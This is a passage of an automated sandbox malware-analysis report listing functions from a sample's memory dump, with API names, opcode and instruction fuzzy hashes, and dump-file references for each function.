                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Init_thread_footer
                                                                                                                    • String ID: CALL
                                                                                                                    • API String ID: 1385522511-4196123274
                                                                                                                    • Opcode ID: 2b5fe4fe3caac08a9f055fcc661c941d94a69606f3c50f0a9fc66fb9f6102ce4
                                                                                                                    • Instruction ID: 7271c395536f68f2461ef9e517328eacb5d0d60ce063b4c5a2a8c68cc69bfdc1
                                                                                                                    • Opcode Fuzzy Hash: 2b5fe4fe3caac08a9f055fcc661c941d94a69606f3c50f0a9fc66fb9f6102ce4
                                                                                                                    • Instruction Fuzzy Hash: 69226032A086818AEB10EF6DD0402ACA7B1FB6AB84F904536DF4D577B9DF38E455C364
                                                                                                                    Function 00007FF7BB7E6838 Relevance: 3.1, APIs: 2, Instructions: 100fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: 27afbee001dd2f14ab302487d27ec6636649baba111da03fe0a26036beb73b09
                                                                                                                    • Instruction ID: 8850cae29cfc48d0d240cd37b8cfdb00d17e773c656d5fc0b544b9a6079ce1d6
                                                                                                                    • Opcode Fuzzy Hash: 27afbee001dd2f14ab302487d27ec6636649baba111da03fe0a26036beb73b09
                                                                                                                    • Instruction Fuzzy Hash: B7418E7290864282E760AF1CE414339A3A4BB6A7A8F845231DF6D176FDCF7DE454CB90
                                                                                                                    Function 00007FF7BB7E6460 Relevance: 3.1, APIs: 2, Instructions: 91libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$Load$AddressFreeProc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2632591731-0
                                                                                                                    • Opcode ID: 4148032de61d84ae77990a54cc2b1f6886a047abe3d4ed031ab241bf62c2a7ff
                                                                                                                    • Instruction ID: 11491f24174329ec46fc33fe00356a6f5174c034ac71e6d497b22d7582af86ad
                                                                                                                    • Opcode Fuzzy Hash: 4148032de61d84ae77990a54cc2b1f6886a047abe3d4ed031ab241bf62c2a7ff
                                                                                                                    • Instruction Fuzzy Hash: 1E414B22B14A1286EB10EB6DD4413BC63A4BF6AB88F844131EF4D476ADDF7CD514C760
                                                                                                                    Function 00007FF7BB7E6258 Relevance: 3.1, APIs: 2, Instructions: 72windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconNotifyShell_
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1144537725-0
                                                                                                                    • Opcode ID: 75f4a0e65c200bc2e40f9fd9660e43366a6e6660fa9f53215bc3a0a6d933da49
                                                                                                                    • Instruction ID: ebd82a7fd6e9a6ff05a35c3a4fda2b7438bb5922c1053797c0b54dc2030fa198
                                                                                                                    • Opcode Fuzzy Hash: 75f4a0e65c200bc2e40f9fd9660e43366a6e6660fa9f53215bc3a0a6d933da49
                                                                                                                    • Instruction Fuzzy Hash: C1413A32909B4586E751AF5DE4403A9A7A8FB5AB88F84013ADF4C07769CF7CD550C760
                                                                                                                    Function 00007FF7BB7E3730 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • IsThemeActive.UXTHEME ref: 00007FF7BB7E3756
                                                                                                                      • Part of subcall function 00007FF7BB809334: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7BB809348
                                                                                                                      • Part of subcall function 00007FF7BB7E36E8: SystemParametersInfoW.USER32 ref: 00007FF7BB7E3705
                                                                                                                      • Part of subcall function 00007FF7BB7E36E8: SystemParametersInfoW.USER32 ref: 00007FF7BB7E3725
                                                                                                                      • Part of subcall function 00007FF7BB7E37B0: GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7BB7E3785), ref: 00007FF7BB7E37F2
                                                                                                                      • Part of subcall function 00007FF7BB7E37B0: IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF7BB7E3785), ref: 00007FF7BB7E3807
                                                                                                                      • Part of subcall function 00007FF7BB7E37B0: GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF7BB7E3785), ref: 00007FF7BB7E388D
                                                                                                                      • Part of subcall function 00007FF7BB7E37B0: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7BB7E3785), ref: 00007FF7BB7E3924
                                                                                                                    • SystemParametersInfoW.USER32 ref: 00007FF7BB7E3797
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme_invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4207566314-0
                                                                                                                    • Opcode ID: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                                                                                    • Instruction ID: 9409ed43e601490901073f8b84c16dc964b3e5f1ed7d4d75c10bb242ebb98c8a
                                                                                                                    • Opcode Fuzzy Hash: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                                                                                    • Instruction Fuzzy Hash: B2012C60D0C2468FF744BB6DA855578B261BF6A300FC5003ADE4D862BACE3DB4A487A0
                                                                                                                    Function 00007FF7BB81B3C0 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 485612231-0
                                                                                                                    • Opcode ID: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                                                                                    • Instruction ID: 6b06b9acdfae2f620f80a30a2cde7e1d45b9c2411ae1f2a39511a33c2c07fa93
                                                                                                                    • Opcode Fuzzy Hash: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                                                                                    • Instruction Fuzzy Hash: 92E04F50E1A24382FE057BBED8080F896917FAAB40BC44034CF0D86279DD2CE47546A0
                                                                                                                    Function 00007FF7BB8204B8 Relevance: 2.6, APIs: 2, Instructions: 55COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseErrorHandleLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 918212764-0
                                                                                                                    • Opcode ID: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                                                                                    • Instruction ID: e4b971c995bdce27a2d25d889655b992e5d7f60b90a596bd6c0f455cce3c0984
                                                                                                                    • Opcode Fuzzy Hash: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                                                                                    • Instruction Fuzzy Hash: 04119661F0C24245FEA47B6CE5942BC92817FBA764FC44135DF2E063FADD6CE86482A1
                                                                                                                    Function 00007FF7BB7F1475 Relevance: 2.0, APIs: 1, Instructions: 533COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Init_thread_footer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1385522511-0
                                                                                                                    • Opcode ID: 14d8bcb0f5e5d36dc6dc2465f5c4b4e36f70afd0639fb95ae083af4e2f9187f7
                                                                                                                    • Instruction ID: 092427556396afb1538f180fe1cfe61ac0dd0648e8df32e0238e3c7c850bdf95
                                                                                                                    • Opcode Fuzzy Hash: 14d8bcb0f5e5d36dc6dc2465f5c4b4e36f70afd0639fb95ae083af4e2f9187f7
                                                                                                                    • Instruction Fuzzy Hash: 9F32B161A186C285EB60EB1DC4502B9E761FBAAB84FC44132DF0E07BB9CF3DE4558764
                                                                                                                    Function 00007FF7BB8420D6 Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearVariant
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1473721057-0
                                                                                                                    • Opcode ID: 2f2a7f0b4b99b489bd401bf82ee2ae899ba245d3bdd8c743c662dd8b12cd4bc5
                                                                                                                    • Instruction ID: e300c22ba8932d8bce2c8fead85e9e13f305b6f20b93ab7e67d6da1627f906c6
                                                                                                                    • Opcode Fuzzy Hash: 2f2a7f0b4b99b489bd401bf82ee2ae899ba245d3bdd8c743c662dd8b12cd4bc5
                                                                                                                    • Instruction Fuzzy Hash: C1414E22B08A8186EB11EF6DD0403AC67B1FB66B84F844536CF0D577A9CF78E455C364
                                                                                                                    Function 00007FF7BB808FAC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3947729631-0
                                                                                                                    • Opcode ID: 867c7b1033e3f760706abf2d2d8e8ea2ff197c00114f18769501bed1359dd07f
                                                                                                                    • Instruction ID: 54744ffd88cd70f934e52e9f7185c8e98bf9cbac919f4b4436e9a1d494647e99
                                                                                                                    • Opcode Fuzzy Hash: 867c7b1033e3f760706abf2d2d8e8ea2ff197c00114f18769501bed1359dd07f
                                                                                                                    • Instruction Fuzzy Hash: 4241AF21A0965286FB64BB2CD850178A291BFA6B80FC45036DF4D076F9DE3DE86587E0
                                                                                                                    Function 00007FF7BB826D04 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3215553584-0
                                                                                                                    • Opcode ID: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
                                                                                                                    • Instruction ID: bd25cba300cc42734be09ab57c0c35317ccdce137a04196668d578e9a81e1dc0
                                                                                                                    • Opcode Fuzzy Hash: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
                                                                                                                    • Instruction Fuzzy Hash: 5721F43260868687EB65AF2DE440379B6A0FB96B90F944234DF5D876E9DF2DC810CB50
                                                                                                                    Function 00007FF7BB8148E0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3215553584-0
                                                                                                                    • Opcode ID: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
                                                                                                                    • Instruction ID: 13d07e6a0a120b6d6eca66b6b3addf09dd501d94f25ca58c6c001db7dd8c3fa1
                                                                                                                    • Opcode Fuzzy Hash: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
                                                                                                                    • Instruction Fuzzy Hash: 65218821A0D68681EA51BF5D940017DD291BFDEB84F984030EF4C577ADDF7CD8618BA0
                                                                                                                    Function 00007FF7BB81E258 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3215553584-0
                                                                                                                    • Opcode ID: cd67e12c883e9f8bd43024705065033ffad1d181a756db3b5eb2a2d32994f697
                                                                                                                    • Instruction ID: 5ce7c14db79b9f8905dd4e45632a87f6de9f12f2b7c15d7108dc741aeeb7f863
                                                                                                                    • Opcode Fuzzy Hash: cd67e12c883e9f8bd43024705065033ffad1d181a756db3b5eb2a2d32994f697
                                                                                                                    • Instruction Fuzzy Hash: E4117231A0E79382F310AB5CA450579E295FBAE381F940035FF8D476BADF2CE42087A0
                                                                                                                    Function 00007FF7BB865B80 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 69bddbc63fd99da0361e32bf605d9336e4230c0dde7f0018513f1afea8dd74fd
                                                                                                                    • Instruction ID: aac1d0be55d7f5b23ab22c221463c916dd3d0a98294534fc7ba88aa1b5f42938
                                                                                                                    • Opcode Fuzzy Hash: 69bddbc63fd99da0361e32bf605d9336e4230c0dde7f0018513f1afea8dd74fd
                                                                                                                    • Instruction Fuzzy Hash: 6E112B26619A4981EB44AF2DE0803A8A360FB99FD0F945132DF1E477B9CF3DD4A08350
                                                                                                                    Function 00007FF7BB820414 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9b30da4845d5eceae66a2d6d402695b56ede85308cac44f88c52346f0b0ebdab
                                                                                                                    • Instruction ID: 98c9f7d24aa30fda01f8f4f5b3cab0c696e2cb0d2332d884fbdf59117db36f20
                                                                                                                    • Opcode Fuzzy Hash: 9b30da4845d5eceae66a2d6d402695b56ede85308cac44f88c52346f0b0ebdab
                                                                                                                    • Instruction Fuzzy Hash: D011306290D6468AEA15AF5CD4402EDB761FBA5754FD08132DB4D066FACFBCD014CBA0
                                                                                                                    Function 00007FF7BB8148EC Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
